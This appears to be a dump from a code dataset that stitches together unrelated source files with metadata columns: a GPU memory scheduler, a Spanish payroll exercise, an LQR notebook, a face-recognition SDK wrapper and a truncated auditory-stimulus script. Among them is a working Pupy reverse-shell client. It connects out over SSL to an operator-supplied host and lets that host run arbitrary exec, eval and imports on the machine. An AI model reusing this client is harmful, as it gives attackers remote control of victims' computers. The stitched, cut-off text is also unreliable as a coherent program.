logged_times = pickle.load(f)
job_num = 1
# profiler = LineProfiler()
# profiler.add_function(get_free_intervals)
# # profiler.add_function(get_occupied_intervals)
# # profiler.add_function(MemoryAnalyzer.get_max_memory_used)
# # profiler.add_function(run_global_memory_analysis)
# profiler_wrapper = profiler(generate_scheduling_plan)
# res = profiler_wrapper(logged_times, 0)
# profiler.print_stats()
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
| pycode/tinyflow/Scheduler.py | 49,665 | Date weighted interval
matplotlib.use('Agg') if not debug_mod: PCIE_bandwidth = nvmlDeviceGetPcieThroughput(handle, NVML_PCIE_UTIL_COUNT) KB/s => MB/ms PCIE_bandwidth /= 1000000 else: print(f'PCIE_bandwidth:{PCIE_bandwidth}') 最早开始时间 最晚结束时间 活跃性分析结果生成 参数不会释放 列出在可行区间内的所有空白时间区间,并按区间排序 if target_task.back_boundary < task.start_time: continue elif task.end_time < target_task.front_boundary: break 区间融合,确保区间之间无交集 按照区间起点排序 防止区间与被调度张量的access重合 按照区间终点排序 按id排序 按起始时间排序 if task.task_type==TaskType.swap_out: (task_id, node_id(tensor_id), start_time, start_node, move_to_gpu, start_node_type) 升序 mid<b i=mid<=j, mid<b, 比较b和j i=mid<=j<b, 插入位置在j+1 i=mid<b<j, 插入位置在j i=mid<=j=b, 插入位置在j+1 b<mid i<=mid=j, b<mid, 比较i和b i<b<mid=j, 插入位置在i+1 b<i<mid=j, 插入位置在i i=b<mid=j, 插入位置在i+1 b==mid,插入位置在mid+1 if isinstance(x,TensorAccess) and isinstance(y, SwapTask): return 1 elif isinstance(x, SwapTask) and isinstance(y, TensorAccess): return -1 初始化时间轴 self.last_unused_swap_tasks = copy.copy(swap_tasks) 更新时间轴 assert swap_tasks[:self.next_swap_tasks_index] == self.last_unused_swap_tasks self.last_unused_swap_tasks = copy.copy(swap_tasks) 计算显存开销 occupied by handle, cudnn, cuda stream and cudart foot_print = {} 首先把输入的x,y以及所有没被swap out的参数载入显存,因为他们从上轮迭代结束时就一直在显存里面 如果此刻时间已经过了释放时间,则释放该访问的附带影响 新参数不额外占用空间 用完即释放的 input本身并不增加gpu使用,swap in增加 使用按照结束时间排序的时间轴进行倒序查找 idx = end_time_axis.index(event) foot_print[time] = memory_used max_memory_actual与是否有考虑价值无关,单纯计量峰值 foot_prints = [] foot_prints.append(foot_print) input 蓝色,output红色 swap_in越晚越好,按结束时间降序排序 至少将第一个访问swap in才算成功,后续的能换入的话,则把前一个的release_flag设为True tensor_id: execution time of operator which generate the tensor for output_tensor_id, input_tensor_id, output_tensor_size, operation_name, is_parameter, shape, inputs_of_model in info: is_parameter: 生成的张量是否为参数 输入的为Byte 转换为MB 对参数进行swap in调度 earliest_swap = None earliest_time = float('inf') 从最早的参数开始安排 随机生成数据用的参数 全局变量 jobs_weight = [1, 1, 1, 1, 1] load_all_model() 获取当前剩余显存总量 如果是此时logged_times已经清空,则 logged_times: [[(operation_id, [time, time, time])]],外层索引为job_id 指数加权平均更新估计时间 key:tensor,value:[所有释放这个张量的重计算对应的在recomputations中的index] 上一轮没有成功的swap_out时为False draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num) MB 最后三次迭代的峰值,做一阶差分,结果的最大值大于上一次峰值的0.05%以上或迭代次数小于100轮才继续~` print(f'iter:{iter}, max_memory:{max_memory}') 对该张量进行swap_out计划的安排 swapped_out表示所有可能的swap_in已经调度过了 首先确定swap_out的时间范围,最迟不能超过此时此刻,最早不能超过第一次访问结束时刻 此时此刻 failed_input_access = [] 如果是因为swap out放不下,则不用继续更新可行区间了,直接break 选出能容纳该任务的剩余空间 看一下后面第一个swap_in能否放下 找到后面第一个访问 failed_input_access.append(access) 修正swap_out_task前向限制为这个失败的input_access的结束时间 swapped_out_tensor.remove(tensor) 如果不是因为swap out没安排下则重新生成区间 安排失败 后续的能换入的话,则把前一个的release_flag设为True print(f'成功{access}') 如果是新参数,则尝试对新参数进行swap out,对对应的旧参数进行swap in 找到对应的旧参数张量 由于二者可行域无关,所以直接查看对应的swap in 能否调度 试图swap in 找到第一次input访问(feed_dict不实际使用) assert not res, f'swap in parameter:{t} failed' 需要重计算 张量不是参数,没被逐出过,且他的所有源张量从未被swap或recomputation 选取metric最大的张量 找到此刻对应的下一个访问 确保source被release过的不进行重计算 fig = go.Figure(data=[go.Scatter(x=list(original_memory_footprint[0].keys()), y=list(original_memory_footprint[0].values())), go.Scatter(x=list(foot_prints[0].keys()), y=list(foot_prints[0].values()))]) plotly.offline.plot(fig, filename='../../pic/footprint.html') if not debug_mod: total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000 else: total_memory = 6000 stats = 'succeed' if max_memory < total_memory else ' failure' print(f'scheduling {stats}') draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num) print(f'recomputations:{recomputations}') swap_order = [(20, 0, 20, 0)] control_messages = [] control_message = [swap_order, [], []] control_messages.append(control_message) global_control_queue.put(control_messages) todo 设置从executor到algorithm的job_id的映射 print("job_id =", job_id) with open("../../global_graphs", "wb") as f1: pickle.dump(global_graphs, f1) print(message_graph[i][6]) print(swap_order) print("total time new is", total_time_new) print("total time old is", total_time_old) with open("./log/total_time.txt", "a") as f1: print(total_time_new, file=f1) todo 此处控制了在一定轮数之后才进行决策 with open("../../logged_times", "wb") as f1: pickle.dump(logged_times, f1) print(logged_times[0]) profiler = LineProfiler() profiler.add_function(get_free_intervals) profiler.add_function(get_occupied_intervals) profiler.add_function(MemoryAnalyzer.get_max_memory_used) profiler.add_function(run_global_memory_analysis) profiler_wrapper = profiler(generate_scheduling_plan) res = profiler_wrapper(logged_times, 0) profiler.print_stats() | 4,583 | zh | 0.339043 |
horasextra = int(input("¿Cuantas horas extra has trabajado? "))
horas = horasextra + 35 #elminimo
extra = 0
sueldo = 0
class trabajo:
def __init__(self, horasextra, horas, extra, sueldo): #defino el constructor
self.horasextra = horasextra
self.horas = horas
self.extra = extra
self.sueldo = sueldo
def horas_totales(self):
if 36 < self.horas < 43:
self.extra = float(self.horas*17) * 1.25
self.sueldo = (35 * 17) + self.extra
print("Ha trabajado: ",horasextra,"horas extra y su sueldo es: ",self.sueldo, "€ ya que ha trabajado en total: ",self.horas,"horas")
if self.horas >= 44:
self.extra = float(self.horas*17) * 1.50
self.sueldo = (35*17) + self.extra
print("Ha trabajado: ",horasextra,"horas extra y su sueldo es: ",self.sueldo,"€ ya que ha trabajado en total: ",self.horas,"horas")
resultado = trabajo(horasextra, horas, extra, sueldo)
print(resultado.horas_totales()) | ej11.py | 1,042 | elminimodefino el constructor | 29 | es | 0.545406 |
#!/usr/bin/env python
# -*- coding: UTF8 -*-
import site
import sys
import time
import rpyc
from rpyc.core.service import Service, ModuleNamespace
from rpyc.lib.compat import execute, is_py3k
import threading
import weakref
import traceback
import os
import subprocess
import threading
import multiprocessing
import logging
import StringIO
import json
import urllib2
import urllib
import platform
import re
import ssl
import random
import imp
class ReverseSlaveService(Service):
""" Pupy reverse shell rpyc service """
__slots__=["exposed_namespace"]
def on_connect(self):
self.exposed_namespace = {}
self._conn._config.update(dict(
allow_all_attrs = True,
allow_public_attrs = True,
allow_pickle = True,
allow_getattr = True,
allow_setattr = True,
allow_delattr = True,
import_custom_exceptions = False,
propagate_SystemExit_locally=False,
propagate_KeyboardInterrupt_locally=True,
instantiate_custom_exceptions = True,
instantiate_oldstyle_exceptions = True,
))
# shortcuts
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
def exposed_exit(self):
raise KeyboardInterrupt
def exposed_execute(self, text):
"""execute arbitrary code (using ``exec``)"""
execute(text, self.exposed_namespace)
def exposed_eval(self, text):
"""evaluate arbitrary code (using ``eval``)"""
return eval(text, self.exposed_namespace)
def exposed_getmodule(self, name):
"""imports an arbitrary module"""
return __import__(name, None, None, "*")
def exposed_getconn(self):
"""returns the local connection instance to the other side"""
return self._conn
def get_next_wait(attempt):
return 0.5
if attempt<60:
return 0.5
else:
return random.randint(15,30)
def add_pseudo_pupy_module(HOST):
if not "pupy" in sys.modules:
mod = imp.new_module("pupy")
mod.__name__="pupy"
mod.__file__="<memimport>\\\\pupy"
mod.__package__="pupy"
sys.modules["pupy"]=mod
mod.get_connect_back_host=(lambda : HOST)
mod.pseudo=True
def main():
HOST="127.0.0.1:443"
if "windows" in platform.system().lower():
try:
import pupy
HOST=pupy.get_connect_back_host()
except ImportError:
print "Warning : ImportError: pupy builtin module not found ! please start pupy from either it's exe stub or it's reflective DLL"
else:
if len(sys.argv)!=2:
exit("usage: %s host:port"%sys.argv[0])
HOST=sys.argv[1]
add_pseudo_pupy_module(HOST)
attempt=0
while True:
try:
rhost,rport=None,None
tab=HOST.rsplit(":",1)
rhost=tab[0]
if len(tab)==2:
rport=int(tab[1])
else:
rport=443
print "connecting to %s:%s"%(rhost,rport)
conn=rpyc.ssl_connect(rhost, rport, service = ReverseSlaveService)
while True:
attempt=0
conn.serve()
except KeyboardInterrupt:
print "keyboard interrupt received !"
break
except Exception as e:
time.sleep(get_next_wait(attempt))
attempt+=1
if __name__=="__main__":
main()
| client/reverse_ssl.py | 2,925 | !/usr/bin/env python -*- coding: UTF8 -*- shortcuts | 51 | en | 0.110115 |
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import sys
print(sys.path)
sys.path.append("../lqr")
from lqr_recursion import LqrRecursion
import chainer
import numpy as np
import matplotlib.pyplot as plt
T =51
f = None
n_state =3
n_ctrl =1
n_sc = n_ctrl +n_state
F =chainer.Variable(np.array([(np.array([[
1.0,0, 0, 1],
[1,1.0,0,0],
[0, 1, 1, 0]])) for i in range(T)])).reshape(T,1,n_state,n_sc,)
c = chainer.Variable(np.array([(np.array([0,0,0.0,0]).T) for i in range(T)])).reshape(T,1,n_sc,)
_C = np.array([np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,1]]) for i in range(T-1)])
_C = np.append(_C , np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,0.00000000000001]]))
C = chainer.Variable(_C).reshape(T,1,n_sc, n_sc)
x_init = chainer.Variable(np.array([0.5428, 0.7633,0.3504])).reshape(1,n_state)
C
test = LqrRecursion(x_init,C,c,F,f,T,n_state,n_ctrl)
Ks, ks = test.backward()
k1 =[]
k2 = []
fig, ax = plt.subplots()
for i in range(T-1):
k1.append(Ks[i][0][0][0].data)
k2.append(Ks[i][0][0][1].data)
major_ticks = np.arange(0,T, 2)
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.set_xticks(major_ticks)
ax.set_ylim(-0.5, 1.2)
ax.plot(k1)
ax.plot(k2)
ax.set_ylim(-2, 0)
ax.set_xlim(0,T)
x,u = test.solve_recursion()
# +
us = []
for i in range(T):
us.append(x[i][0][0].data)
fig, ax = plt.subplots()
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
# y軸に目盛線を設定
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
major_ticks = np.arange(0, 20, 2)
ax.set_xticks(major_ticks)
ax.set_ylim(-2, 1)
ax.set_xlim(0, 20)
ax.plot(us, marker='.')
plt.show()
# -
Ks
Ks
len(Ks)
x
| examples/Boyd_lqr.py | 2,276 | -*- coding: utf-8 -*- --- jupyter: jupytext: text_representation: extension: .py format_name: light format_version: '1.4' jupytext_version: 1.2.1 kernelspec: display_name: Python 3 language: python name: python3 --- + y軸に目盛線を設定 - | 273 | en | 0.456729 |
'''
Created on August 18th 2020
@author: Nisha Srinivas
'''
import faro
import os
import faro.proto.proto_types as pt
import faro.proto.face_service_pb2 as fsd
import numpy as np
import pyvision as pv
import time
from PIL import Image
import json
import faro.proto.geometry_pb2 as geo
from array import array
roc = None
def getOptionsGroup(parser):
rankone_options = parser.add_option_group("Options for RankOne")
rankone_options.add_option("--img-quality", type=float, dest="img_quality",default=None)
rankone_options.add_option("--num-faces", type=int, dest="num_faces", default=None)
rankone_options.add_option("--min-face-size", dest="min_face_size", default='recommended')
class RankOneFaceWorker(faro.FaceWorker):
'''
classdocs
'''
def __init__(self, options):
'''
Constructor
'''
'''
Initialize ROC SDK. looks for the license file and optionally we can provide a log file. If it cannot find the license then it will quit. Roc_ensure catches the error and aborts.
'''
global roc
import roc as _local_roc
roc = _local_roc
if os.environ.get('ROC_LIC') is not None:
roc.roc_ensure(roc.roc_initialize(None,None))
else:
self.license_file = (roc.__file__).split('python')[0] + 'ROC.lic'
roc.roc_ensure(roc.roc_initialize(self.license_file.encode('utf-8'),None))
print("ROC SDK Initialized")
self.img_quality = options.img_quality
self.num_faces = options.num_faces
self.min_face_size = options.min_face_size
self.detection_threshold = self.recommendedDetectionThreshold()
if self.img_quality is None:
self.img_quality = self.recommendedImgQuality()
if self.num_faces is None:
self.num_faces = self.recommendedMaxFacesDetected()
'''
ROC_Frontal : ROC frontal face detector (-30 to +30 degress yaw)
ROC_FR : Represent in-the-wild-faces for comparison
Note : Non-frontal faces detected by ROC_FULL and ROC_PARTIAL are not reliable for recognition.
Therefore we advise against using ROC_FULL or ROC_PARTIAL in conjunction with ROC_FR or ROC_ID.
ROC_FULL : ROC face detector (-100 to +100 degrees yaw)
ROC_DEMOGRAPHICS - Return age, gender, sex
ROC_PITCHYAW - Returns yaw and pitch
'''
self.algorithm_id_detect = roc.ROC_FULL
self.algorithm_id_extract = roc.ROC_MANUAL | roc.ROC_FR | roc.ROC_DEMOGRAPHICS | roc.ROC_LANDMARKS | roc.ROC_PITCHYAW
roc.roc_ensure(roc.roc_preload(self.algorithm_id_detect))
roc.roc_ensure(roc.roc_preload(self.algorithm_id_extract))
def _converttoRocImage(self,imgarray):
#convert to PIL image (This has to be an RGB image)
image_pillow = Image.fromarray(imgarray)
#conver PIL to roc image
image_roc = roc.roc_image()
image_roc.width = image_pillow.width
image_roc.height = image_pillow.height
image_roc.step = 3 * image_pillow.width
image_roc.color_space = roc.ROC_BGR24
bytes = 3 * image_pillow.width * image_pillow.height
image_roc.data = roc.new_uint8_t_array(bytes + 1)
roc.memmove(image_roc.data, image_pillow.tobytes())
#RankOne requires a BGR image
roc.roc_ensure(roc.roc_swap_channels(image_roc))
return image_roc
def _rocFlatten(self,tmpl):
'''
Converts roc template to serialized data.
Datatype = bytes
'''
buffer_size = roc.new_size_t()
#calculates the bytes required to a template
roc.roc_flattened_bytes(tmpl, buffer_size)
buffer_size_int = roc.size_t_value(buffer_size)
roc_buffer_src = roc.new_uint8_t_array(buffer_size_int)
roc.roc_flatten(tmpl, roc_buffer_src)
native_buffer = roc.cdata(roc_buffer_src, buffer_size_int)
roc.delete_size_t(buffer_size)
roc.delete_uint8_t_array(roc_buffer_src)
return native_buffer
def _rocUnFlatten(self, buff, template_dst):
'''
Converts serialized data back to roc template.
'''
#template_dst = roc.roc_template()
roc_buffer_dst = roc.new_uint8_t_array(len(buff) + 1)
roc.memmove(roc_buffer_dst, buff)
roc.roc_unflatten(roc_buffer_dst, template_dst)
roc.delete_uint8_t_array(roc_buffer_dst)
return template_dst
def _detect(self,im, opts):
'''
In RankOne, face detection happends within the roc_represent function.
There is no explicit face detection step like in dlib.
But we will output the bounding box. but it is not really useful in this case.
'''
'''
Rank one requires the image to be of type roc_image. Hence
we will check for the image type. In this case it is a numpy array (skimage imread).
Check if the image is a numpy array and if it is then conver it to a PIL image and
then to a roc_image. The reason I am doing this is cause rankone provides example code
to convert from PIL image to roc_image.
'''
h,w,_ = im.shape
if isinstance(im,np.ndarray):
im = self._converttoRocImage(im)
'''
indicates the smalled face to detect
Face detection size is measured by the width of the face in pixels.
The default value is 36. It roughly correspinds to 18 pixels between the eyes.
'''
if self.min_face_size == 'recommended':
self.min_face_size = self.recommendedMinFaceSize()
elif self.min_face_size == 'adaptive_size':
'''
A method for determining the minimum face detection size as a fraction of the image size.
In the interest of efficiency, it is recommended to set a lower bound on the minimum face detection size as a fraction of the image size. Given a relative minimum size of 4% of the image dimensions, and an absolute minimum size of 36 pixels, the adaptive minimum size is: max(max(image.width, image.height) * 0.04, 36).
Example
roc_image image = ...;
size_t adaptive_minimum_size;
roc_adaptive_minimum_size(image, 0.04, 36, &adaptive_minimum_size);
'''
adaptive_minimum_size = new_size_t()
roc_ensure(roc_adaptive_minimum_size(im, 0.04, 36, adaptive_minimum_size))
else:
self.min_face_size = int(self.min_face_size)
self.detection_threshold = opts.threshold
if opts.best:
self.num_faces = 1
#create a template array
templates = roc.new_roc_template_array(self.num_faces)
if self.min_face_size != 'adaptive_size':
roc.roc_represent(im, self.algorithm_id_detect, self.min_face_size, self.num_faces, self.detection_threshold, self.img_quality, templates)
else:
roc.roc_represent(im, self.algorithm_id_detect, size_t_value(adaptive_minimum_size), self.num_faces, detection_threshold, self.img_quality, templates)
roc.delete_size_t(adaptive_minimum_size)
# we don't need to check for best mode here. If a failed detection occurs then
#create a template by manually specifying the bounding box
# fix the missing detection case
curr_template = roc.roc_template_array_getitem(templates, 0)
if (curr_template.algorithm_id == 0 or curr_template.algorithm_id & roc.ROC_INVALID):
curr_template = roc.roc_template_array_getitem(templates, 0)
curr_template.detection.x = int(w * 0.5)
curr_template.detection.y = int(h * 0.5)
curr_template.detection.width = w
curr_template.detection.height = h
roc.roc_template_array_setitem(templates,0,curr_template)
roc.roc_represent(im, roc.ROC_MANUAL, self.min_face_size, 1, self.detection_threshold, self.img_quality, templates)
roc.roc_free_image(im)
return templates
def detect(self,img,face_records,options):
detected_templates = self._detect(img,options)
for i in range(0,self.num_faces):
curr_template = roc.roc_template_array_getitem(detected_templates, i)
if curr_template.algorithm_id & roc.ROC_INVALID or curr_template.algorithm_id == 0:
continue
else:
face_record = face_records.face_records.add()
face_record.detection.score = curr_template.detection.confidence
xc, yc, w, h = curr_template.detection.x, curr_template.detection.y, curr_template.detection.width, curr_template.detection.height
x = int(xc - (w*0.5))
y = int(yc - (w*0.5))
face_record.detection.location.CopyFrom(pt.rect_val2proto(x, y, w, h))
face_record.detection.detection_id = i
face_record.detection.detection_class = "FACE"
face_record.template.buffer = self._rocFlatten(curr_template)
#Free all the roc stuff
for i in range(0,self.num_faces):
roc.roc_free_template(roc.roc_template_array_getitem(detected_templates,i))
def extract(self, img, face_records):
if isinstance(img,np.ndarray):
im = self._converttoRocImage(img)
for face_record in face_records.face_records:
template_dst = roc.roc_template()
self._rocUnFlatten(face_record.template.buffer, template_dst)
roc.roc_represent(im, self.algorithm_id_extract, self.recommendedMinFaceSize(), 1, self.recommendedDetectionThreshold(), self.recommendedImgQuality(), template_dst)
if template_dst.algorithm_id & roc.ROC_INVALID or template_dst.algorithm_id == 0:
continue
else:
xc, yc, w, h = template_dst.detection.x, template_dst.detection.y, template_dst.detection.width, template_dst.detection.height
x = int(xc - (w*0.5))
y = int(yc - (w*0.5))
assert (face_record.detection.location.x == x), "They have to be equal cause"
assert (face_record.detection.location.y == y), "They have to be equal cause"
assert (face_record.detection.location.width == w), "They have to be equal cause"
assert (face_record.detection.location.height == h), "They have to be equal cause"
'''
default metadata fields : ChinX,ChinY, IOD (inter-occular distance), LeftEyeX, LeftEyeY, NoseRootX,
NoseRootY, Path, Pose, Quality, RightEyeX, RightEyeY, Roll
'''
metadata_info = json.loads(template_dst.md.decode('utf-8'))
landmark = face_record.landmarks.add()
landmark.landmark_id = 'Nose'
landmark.location.x = metadata_info['NoseRootX']
landmark.location.y = metadata_info['NoseRootY']
landmark = face_record.landmarks.add()
landmark.landmark_id = 'LeftEye'
landmark.location.x = metadata_info['LeftEyeX']
landmark.location.y = metadata_info['LeftEyeY']
landmark = face_record.landmarks.add()
landmark.landmark_id = 'RightEye'
landmark.location.x = metadata_info['RightEyeX']
landmark.location.y = metadata_info['RightEyeY']
landmark = face_record.landmarks.add()
landmark.landmark_id = 'ChinX'
landmark.location.x = metadata_info['ChinX']
landmark.location.y = metadata_info['ChinY']
demographic = face_record.attributes.add()
demographic.key = 'Age'
demographic.text = str(metadata_info['Age'])
demographic = face_record.attributes.add()
demographic.key = 'Gender'
demographic.text = metadata_info['Gender']
demographic = face_record.attributes.add()
demographic.key = 'GeographicOrigin'
demographic.text = metadata_info['GeographicOrigin']
demographic = face_record.attributes.add()
demographic.key = 'Emotion'
demographic.text = metadata_info['Emotion']
demographic = face_record.attributes.add()
demographic.key = 'Artwork'
demographic.text = metadata_info['Artwork']
demographic = face_record.attributes.add()
demographic.key = 'Yaw'
demographic.text = str(metadata_info['Yaw'])
face_record.template.buffer = self._rocFlatten(template_dst)
roc.roc_ensure(roc.roc_free_template(template_dst))
def locate(self,img,face_records,options):
'''
Not needed as we find the location of the eyes, nose and chin during detection and have
added it to face records during detection
'''
pass
def align(self,image,face_records):
'''Align the images to a standard size and orientation to allow
recognition.'''
pass # Not needed for this algorithm.
def scoreType(self):
'''Return the method used to create a score from the template.
By default server computation is required.
SCORE_L1, SCORE_L2, SCORE_DOT, SCORE_SERVER
'''
return fsd.SERVER
def score(self,score_request):
'''Compare templates to produce scores.'''
score_type = self.scoreType()
result = geo.Matrix()
# Check that this is a known score type
if score_type not in [fsd.SERVER]:
raise NotImplementedError("Score type <%s> not implemented."%(score_type,))
# Check to make sure the probe and gallery records are correct
if len(score_request.template_probes.templates) == 0:
raise ValueError("no probe templates were found in the arguments.")
if len(score_request.template_gallery.templates) == 0:
raise ValueError("no gallery templates were found in the arguments.")
#THIS IS NOT NECESSAY AS WE ARE ALWAYS COPYING THE TEMPLATES AND NOT USING FACE RECORD -> REFER TO
#FUNCTION in FaceClient.py
'''
if min(len(score_request.face_probes.face_records),len(score_request.template_probes.templates)) != 0:
raise ValueError("probes argument cannot have both face_probes and template_probes defined.")
if max(len(score_request.face_probes.face_records),len(score_request.template_probes.templates)) == 0:
raise ValueError("no probe templates were found in the arguments.")
if min(len(score_request.face_gallery.face_records),len(score_request.template_gallery.templates)) != 0:
raise ValueError("gallery argument cannot have both face_gallery and template_gallery defined.")
if max(len(score_request.face_gallery.face_records),len(score_request.template_gallery.templates)) == 0:
raise ValueError("no gallery templates were found in the arguments.")
'''
#This is the first attempt at computing similarity scores. This is definitely not the fastest approach.
#Also , this is going to be restricted by memory. The whole similarity matrix be be held in memory.
#So for large datasets this might pose a problem
if score_type == fsd.SERVER:
#rows = probe images
#cols = gallery images
sim_mat = np.zeros((len(score_request.template_probes.templates),len(score_request.template_gallery.templates)),dtype=np.float32)
roc_probe_template = roc.roc_template()
roc_gallery_template = roc.roc_template()
#roc_gallery_template_array = roc.new_roc_template_array(len(score_request.template_gallery.templates))
sm_metric = roc.new_roc_similarity()
for p in range(0,len(score_request.template_probes.templates)):
self._rocUnFlatten(score_request.template_probes.templates[p].buffer,roc_probe_template)
#print roc_probe_template
for g in range(0,len(score_request.template_gallery.templates)):
#print(p,g)
#if p == 0:
# roc_gallery_template = roc.roc_template()
# self._rocUnFlatten(score_request.template_gallery.templates[g].buffer,roc_gallery_template)
# roc.roc_template_array_setitem(roc_gallery_template_array,g,roc_gallery_template)
#roc_gallery_template = roc.roc_template()
self._rocUnFlatten(score_request.template_gallery.templates[g].buffer,roc_gallery_template)
#roc.roc_compare_templates(roc_probe_template, roc.roc_template_array_getitem(roc_gallery_template_array,g), sm_metric)
roc.roc_compare_templates(roc_probe_template, roc_gallery_template, sm_metric)
sim_mat[p,g] = roc.roc_similarity_value(sm_metric)
#roc.roc_free_template(roc_gallery_template)
roc.delete_roc_similarity(sm_metric)
roc.roc_free_template(roc_probe_template)
roc.roc_free_template(roc_gallery_template)
#for i in range(len(score_request.template_gallery.templates)):
#print(i)
# roc.roc_ensure(roc.roc_free_template(roc.roc_template_array_getitem(roc_gallery_template_array, i)))
else:
NotImplementedError("ScoreType %s is not implemented."%(score_type,))
#RankOne returns a similarity score of -1 if it compares with an invalid template
#Threfore find all -1's in the matrix and replace it with a 0
sim_mat[sim_mat == -1.0] = 0.0
#converting the simialrity matrix to distance matrix by subtracting with 1
dist_mat = 1.0 - sim_mat
# Return the result
return pt.matrix_np2proto(dist_mat)
def status(self):
'''Return a simple status message.'''
print("Handeling status request.")
status_message = fsd.FaceServiceInfo()
status_message.status = fsd.READY
status_message.detection_support = True
status_message.extract_support = True
status_message.score_support = False
status_message.score_type = self.scoreType()
status_message.algorithm = "RankOne_%s"%(roc.__file__);
status_message.detection_threshold = self.recommendedDetectionThreshold()
status_message.match_threshold = self.recommendedScoreThreshold()
return status_message
def recommendedImgQuality(self):
return roc.ROC_SUGGESTED_MIN_QUALITY
def recommendedDetectionThreshold(self):
'''
The false_detection_rate parameter specifies the allowable
false positive rate for face detection.The suggested default
value for false_detection_rate is 0.02 which corresponds to
one false detection in 50 images on the FDDB benchmark. A
higher false detection rate will correctly detect more faces
at the cost of also incorrectly detecting more non-faces.
The accepted range of values for false_detection_rate is
between 0 to 1. Values outside this range will be modified
to be at the aforementioned bounds automatically.
'''
return 0.02
def recommendedMaxFacesDetected(self):
return 10
def recommendedMinFaceSize(self):
return 32
def recommendedScoreThreshold(self,far=-1):
'''Return the method used to create a score from the template.
By default server computation is required.
Should return a recommended score threshold.
DLIB recommends a value of 0.6 for LFW dataset
'''
return 0.60
def cleanexit(self):
print('ROC SDK Deinitialized')
roc.roc_finalize()
| src/faro/face_workers/RankOneFaceWorker.py | 20,517 | classdocs
Constructor
In RankOne, face detection happends within the roc_represent function.
There is no explicit face detection step like in dlib.
But we will output the bounding box. but it is not really useful in this case.
Converts roc template to serialized data.
Datatype = bytes
Converts serialized data back to roc template.
Align the images to a standard size and orientation to allow
recognition.
Not needed as we find the location of the eyes, nose and chin during detection and have
added it to face records during detection
The false_detection_rate parameter specifies the allowable
false positive rate for face detection.The suggested default
value for false_detection_rate is 0.02 which corresponds to
one false detection in 50 images on the FDDB benchmark. A
higher false detection rate will correctly detect more faces
at the cost of also incorrectly detecting more non-faces.
The accepted range of values for false_detection_rate is
between 0 to 1. Values outside this range will be modified
to be at the aforementioned bounds automatically.
Return the method used to create a score from the template.
By default server computation is required.
Should return a recommended score threshold.
DLIB recommends a value of 0.6 for LFW dataset
Compare templates to produce scores.
Return the method used to create a score from the template.
By default server computation is required.
SCORE_L1, SCORE_L2, SCORE_DOT, SCORE_SERVER
Return a simple status message.
Created on August 18th 2020
@author: Nisha Srinivas
convert to PIL image (This has to be an RGB image)conver PIL to roc imageRankOne requires a BGR imagecalculates the bytes required to a templatetemplate_dst = roc.roc_template()create a template array we don't need to check for best mode here. If a failed detection occurs then create a template by manually specifying the bounding box fix the missing detection caseFree all the roc stuff Not needed for this algorithm. Check that this is a known score type Check to make sure the probe and gallery records are correctTHIS IS NOT NECESSAY AS WE ARE ALWAYS COPYING THE TEMPLATES AND NOT USING FACE RECORD -> REFER TO FUNCTION in FaceClient.pyThis is the first attempt at computing similarity scores. This is definitely not the fastest approach.Also , this is going to be restricted by memory. The whole similarity matrix be be held in memory.So for large datasets this might pose a problemrows = probe imagescols = gallery imagesroc_gallery_template_array = roc.new_roc_template_array(len(score_request.template_gallery.templates))print roc_probe_templateprint(p,g)if p == 0: roc_gallery_template = roc.roc_template() self._rocUnFlatten(score_request.template_gallery.templates[g].buffer,roc_gallery_template) roc.roc_template_array_setitem(roc_gallery_template_array,g,roc_gallery_template)roc_gallery_template = roc.roc_template()roc.roc_compare_templates(roc_probe_template, roc.roc_template_array_getitem(roc_gallery_template_array,g), sm_metric)roc.roc_free_template(roc_gallery_template)for i in range(len(score_request.template_gallery.templates)):print(i) roc.roc_ensure(roc.roc_free_template(roc.roc_template_array_getitem(roc_gallery_template_array, i)))RankOne returns a similarity score of -1 if it compares with an invalid templateThrefore find all -1's in the matrix and replace it with a 0converting the simialrity matrix to distance matrix by subtracting with 1 Return the result | 3,456 | en | 0.663953 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from locales import Locales
print("content-type:text/html\n\n")
locales_obj = Locales('en')
print(locales_obj.get_missing_translations())
| get_missing_translations.py | 188 | !/usr/bin/env python3 -*- coding: utf-8 -*- | 43 | fr | 0.304089 |
"""
Generate Steady-State Auditory Evoked Potential (SSAEP)
=======================================================
Steady-State Auditory Evoked Potential (SSAEP) - also known as Auditory
Steady-State Response (ASSR) - stimulus presentation.
"""
from time import time
import numpy as np
from pandas import DataFrame
from psychopy import visual, core, event, sound
from scipy import stats
__title__ = "Auditory SSAEP (orig)"
def present(
save_fn: str,
duration=120,
n_trials=2010,
iti=0.5,
soa=3.0,
jitter=0.2,
volume=0.8,
random_state=42,
eeg=None,
cf1=900,
amf1=45,
cf2=770,
amf2=40.018,
sample_rate=44100,
):
"""
Auditory SSAEP Experiment
===========================
Parameters:
-----------
duration - duration of the recording in seconds (default 10)
n_trials - number of trials (default 10)
iti - intertrial interval (default 0.3)
soa - stimulus onset asynchrony, = interval between end of stimulus
and next trial (default 0.2)
jitter - jitter in the intertrial intervals (default 0.2)
secs - duration of the sound in seconds (default 0.2)
volume - volume of the sounds in [0,1] (default 0.8)
random_state - random seed (default 42)
"""
# Set up trial parameters
np.random.seed(random_state)
markernames = [1, 2]
record_duration = np.float32(duration)
# Initialize stimuli
am1 = generate_am_waveform(cf1, amf1, secs=soa, sample_rate=sample_rate)
am2 = generate_am_waveform(cf2, amf2, secs=soa, sample_rate=sample_rate)
aud1 = sound.Sound(am1, sampleRate=sample_rate)
aud1.setVolume(volume)
aud2 = sound.Sound(am2, sampleRate=sample_rate)
aud2.setVolume(volume)
auds = [aud1, aud2]
# Set up trial list
